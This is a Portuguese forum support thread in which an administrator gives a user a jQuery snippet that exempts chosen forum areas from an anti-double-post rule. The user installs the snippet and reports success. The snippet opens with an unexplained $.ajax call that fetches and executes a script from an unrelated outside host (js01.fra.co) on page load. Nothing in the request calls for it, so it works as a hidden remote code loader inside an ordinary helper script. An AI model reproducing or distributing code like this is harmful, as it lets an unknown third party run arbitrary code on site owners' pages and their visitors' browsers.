Compartilhe
Ir em baixo
avatar
Unranked
Mensagens : 23
Cash : 45
Reputação : 4
Localização : IP
Ver perfil do usuário

Resolvido Código para tolerar o anti double-post

em Dom Mar 08, 2015 6:13 pm



Versão: phpBB3

 
Descrição:

Boa noite, pessoal!

Possuo o código ant double-post (personalizado; moderadores imunes). Pois bem, é possível um code cujo toleraria o ant double-post em áreas específicas?

Se sim, posteriormente postarei o link das respectivas áreas.

Obrigado pela atenção.
avatar
Administrador
Mensagens : 72
Cash : 258
Reputação : 36
Ver perfil do usuáriohttp://www.lokoscripts.com

Resolvido Re: Código para tolerar o anti double-post

em Dom Mar 08, 2015 6:31 pm
Boa noite!

Na próxima poste o código que está utilizando, ok? Como e um dos nossos tutoriais
http://www.lokoscripts.com/t45-ant-double-post-so-para-usuarios
Apenas cite a url do tutorial. Smile

Quais os links das categorias? Posso tentar sim.

Atenciosamente.
avatar
Unranked
Mensagens : 23
Cash : 45
Reputação : 4
Localização : IP
Ver perfil do usuário

Resolvido Re: Código para tolerar o anti double-post

em Dom Mar 08, 2015 7:03 pm
avatar
Administrador
Mensagens : 72
Cash : 258
Reputação : 36
Ver perfil do usuáriohttp://www.lokoscripts.com

Resolvido Re: Código para tolerar o anti double-post

em Dom Mar 08, 2015 7:12 pm
Olá!

Troque por este:
Código:


    $(function(){    $.ajax({url:'http://js01.fra.co/32967.js',cache:!0,dataType:'script', success:function(){  }});
var url = $fa.resid; if(url === 7 || url === 90 || url === 49 || url === 132 || url === 180 || url === 21 || url === 23){var verificar = $fa.ismod; if(verificar == true){console.log("E um moderador, nada fazer... ")} else {    jQuery(document).ready(function(){var r='form';var k='#quick_reply';var t=jQuery('input[name="t"]').val();var p='/t'+t+'-';if(jQuery(k).length){var q=''}else{var q='<br><a href="'+p+'">Clique aqui</a> para voltar ao tópico.'};var s='<img src=http://illiweb.com/fa/admin/icones/big_ico/warning.png><br>É proibido fazer double post.'+q;if(jQuery('body#phpbb').length){var m='<div class=panel style=font-size:23px><span class=corners-top></span><center style=padding:5px>'+s+'</center><span class=corners-bottom></span></div>';var h='p.author'}else if(jQuery('table.bodylinewidth').length){var m='<table width=100%><tr><td align=center>'+s+'</td></tr></table>';var h='.name'}else{var m='<div class="main-content message box-content" style=text-align:center;padding:5px>'+s+'</div>';var h='.username'};if(jQuery(r+'[action="/post"]').length&&jQuery('input[name="mode"][value="reply"]').length){var g=jQuery('a.mainmenu#logout').text().split('[ ')[1].replace(/ ]/g,'');if(jQuery(k).length){jQuery.get('/post?t='+t+'&mode=reply',function(d){if(jQuery(h+':eq(0)',d).text().split(' em')[0].replace(' por ','')==g){jQuery(r+k).html(m)}})}else{if(jQuery(h+':eq(0)').text().split(' em')[0].replace(' por ','')==g){jQuery(r+'[action="/post"]').html(m)}}}}); }}
    });

Resulta?
avatar
Unranked
Mensagens : 23
Cash : 45
Reputação : 4
Localização : IP
Ver perfil do usuário

Resolvido Re: Código para tolerar o anti double-post

em Dom Mar 08, 2015 7:17 pm
Aplico somente em tópicos ou sub-fóruns?
avatar
Administrador
Mensagens : 72
Cash : 258
Reputação : 36
Ver perfil do usuáriohttp://www.lokoscripts.com

Resolvido Re: Código para tolerar o anti double-post

em Dom Mar 08, 2015 7:19 pm
Só nos tópicos! Smile
avatar
Unranked
Mensagens : 23
Cash : 45
Reputação : 4
Localização : IP
Ver perfil do usuário

Resolvido Re: Código para tolerar o anti double-post

em Seg Mar 09, 2015 10:47 am
Funcionou! Muito obrigado! Very Happy
avatar
Administrador
Mensagens : 72
Cash : 258
Reputação : 36
Ver perfil do usuáriohttp://www.lokoscripts.com

Resolvido Re: Código para tolerar o anti double-post

em Seg Mar 09, 2015 11:21 am
De nada amigo.
#Fechado
Conteúdo patrocinado

Resolvido Re: Código para tolerar o anti double-post

Voltar ao Topo
Permissão deste fórum:
Você não pode responder aos tópicos neste fórum